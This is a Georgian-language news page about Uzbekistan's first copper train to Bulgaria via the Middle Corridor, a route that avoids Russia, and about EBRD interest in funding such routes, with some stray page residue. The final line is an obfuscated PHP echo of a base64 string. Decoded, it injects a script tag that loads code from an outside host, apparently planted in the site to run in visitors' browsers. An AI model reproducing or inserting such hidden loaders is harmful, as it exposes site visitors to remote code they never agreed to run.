celsiusi
ავერსი შნაიდერი
უზბეკეთმა სპილენძით დატვირთული მატარებელი პირველად გაგზავნა ახალი მარშრუტით, რომელიც რუსეთის გვერდის ავლით გადის. ამის შესახებ ინფორმაციას სააგენტო „როიტერი“ უზბეკეთის რკინიგზის სახელმწიფო კომპანიაზე დაყრდნობით ავრცელებს.
კომპანიის განცხადებით, მატარებელი ბულგარეთში ჩაიტანს ალმალიკის სამთო-მეტალურგიული კომბინატის სპილენძის კონცენტრატით სავსე 46 ვაგონს და 91 კონტეინერს. ტვირთი უზბეკეთიდან ბულგარეთში შუა დერეფნით თურქმენეთის, აზერბაიჯანის, საქართველოს, ასევე კასპიისა და შავი ზღვების გავლით ჩავა.
ბრიუსელი შუა დერეფანს ევროპისა და აზიის დამაკავშირებელ ალტერნატიულ მარშრუტად განიხილავს, რომლითაც ტვირთების გადაზიდვა რუსეთის გვერდის ავლით არის შესაძლებელი. გასულ თვეში ევროპის რეკონსტრუქციისა და განვითარების ბანკმა განაცხადა, რომ მზად არის, ევროპასა და აზიას შორის რუსეთის გვერდის ავლით სატვირთო მარშრუტების განვითარებაში მილიარდობით ევროს ინვესტიცია ჩადოს.
389
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");